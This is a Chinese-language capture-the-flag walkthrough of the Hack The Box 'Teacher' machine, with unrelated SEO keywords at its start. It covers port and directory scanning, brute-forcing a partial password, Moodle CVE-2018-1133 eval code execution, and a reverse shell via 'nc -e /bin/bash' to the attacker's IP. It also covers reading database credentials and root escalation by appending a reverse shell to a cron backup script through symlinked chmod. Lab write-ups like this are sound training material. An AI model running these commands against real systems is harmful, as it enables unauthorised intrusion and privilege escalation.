智达世通建设集团有限公司网站,wordpress主题添加字体设置,合肥网站优化公司,o2o电子商务模式是指nmapnmap -sV -sC -p- -T4 -oA nmap 10.10.10.153nmap只发现了对外开放了80端口#xff0c;从http-title看出可能是某个中学的官网http打开网站确实是一个官网#xff0c;查看每个接口看看有没有可以利用的地方发现了一个接口#xff0c;/images/5.png#xff0c;但是响应包…nmapnmap -sV -sC -p- -T4 -oA nmap 10.10.10.153nmap只发现了对外开放了80端口从http-title看出可能是某个中学的官网http打开网站确实是一个官网查看每个接口看看有没有可以利用的地方发现了一个接口/images/5.png但是响应包中却是一段文字这个Giovanni写忘记了密码的最后一个字符很有可能是想要我们去暴力破解Th4C00lTheacha再添加最后一个字符从a-zA-Z0-9在加上常用标点符号生成一组密码找到登录口后暴力破解进入后台尝试admin/administrator等常见后台登录接口也没反应直接扫描网站目录吧暴力破解gobuster dir -u http://10.10.10.153/ -w /usr/share/wordlists/dirb/big.txt -o gobuster最终发现了这些接口其中尝试访问/moodle接口时跳转到teacher.htb尝试将该域名添加至/etc/hosts再次访问该页面得到如下结果看起来像是老师用的界面wappalyzer显示这个moodle是一个LMS可以尝试获取版本信息后查阅相关漏洞。之前的用户Giovanni可能是一个老师右上角有一个登录按钮尝试使用刚才得到的用户名和残缺的密码暴力破解登录系统首先将登录时的数据包发送至burpsuite的intruder在密码的最后一位添加替换位$password$之后burpsuite便会自动替换这一位的字符设置payloads为a-zA-Z0-9常见字符先试一下可以看到#相应长度不同于其他尝试使用Giovanni/Th4C00lTheacha#登录系统成功登陆使用moodlescan扫描一下目标网站看看能不能发现一些东西python3 moodlescan.py -k-u http://moodle.example.com/moodle_path/扫描结果如下发现系统使用的moodle版本为3.4.1cve-2018-1133Moodle 允许教师设置包含多种问题的测验。其中包括计算问题它允许教师输入一个数学公式该公式将由 Moodle 对随机输入变量进行动态评估。这可以防止学生作弊并简单地分享他们的结果。例如教师可以键入 什么是 {x} 添加到 {y}答案公式为 {x}{y}。 Moodle 然后会生成两个随机数并将它们插入问答文本中的 占位符 {x} 和 {y} 例如3.92.1。 最后它将通过调用安全敏感的 PHP 函数来 评估答案 6.0eval() 以其恶意潜力而闻名的公式输入因为它允许执行任意 PHP 代码。查看https://www.sonarsource.com/blog/moodle-remote-code-execution/文章获取更多信息开始复现该漏洞首先肯定是要登录系统前往Site home– 点击Algebra– 点击Turn editing on点击Add an activity or resource-点击Quiz-Add随便写点东西然后点击保存save and return to course比如我创建了一个名为test的quiz点击test进入然后选择编辑edit quiz进入编辑后选择add在选择a new question类型选择calculated点击add添加然后将上文链接文章中的代码写入answers中还要选择100%负责会报错 然后点击save changes保存配置下一个页面无需修改内容直接点击next page即可在跳转至下一个页面即可使用“0”来执行远程代码使用nc -e /bin/bash 10.10.*.* 4444将shell传递给kalikali提前监听端口www-data拿到一个www-data权限的shell用python获取一个交互式shellpython3 -c import pty; pty.spawn(/bin/bash)在网站根目录中发现了很多config文件打开看看在config.php中可以看到数据库相关信息使用查到的数据库信息登录mysqluse moodle;使用moodle数据库里面有一张叫mdl_user的表其中存储着用户信息查看表发现列名username和password查看username和password内容其中最后一行Giovannibak的密码像是使用了md5加密解密得到密码为expelled查看/etc/passwd发现并没有用户叫Giovannibak再加上bak很可能意味着这个密码是giovanni用户的备用密码尝试使用改密码切换至giovanni用户成功链接到用户后我们可以找到user.txt并查看giovanni→root在giovanni目录下进入tmp目录发现backup_courses.tar.gz每分钟都在运行似乎是参与了一个cron job且该文件属于root用户向靶机上传pspy工具检索所有的cron job查看backup.sh的内容。进入work目录将课程目录添加到tmp/backup_courses.tar.gz中然后进入tmp目录解压文件并将tmp中所有文件权限设置为777脚本由root用户创建不能修改chmod 从不更改符号链接的权限chmod 系统调用无法更改其权限。这不是问题因为从不使用符号链接的权限。但是对于命令行中列出的每个符号链接chmod 都会更改指向文件的权限。相反chmod 忽略递归目录遍历期间遇到的符号链接在~/work/tmp中创建链接尝试在脚本中追加nc -e /bin/bash 10.10.14.14 1111 /usr/bin/backup.sh开启监听等待任务执行后就能收到一个shell然后就可以查看flag了over!
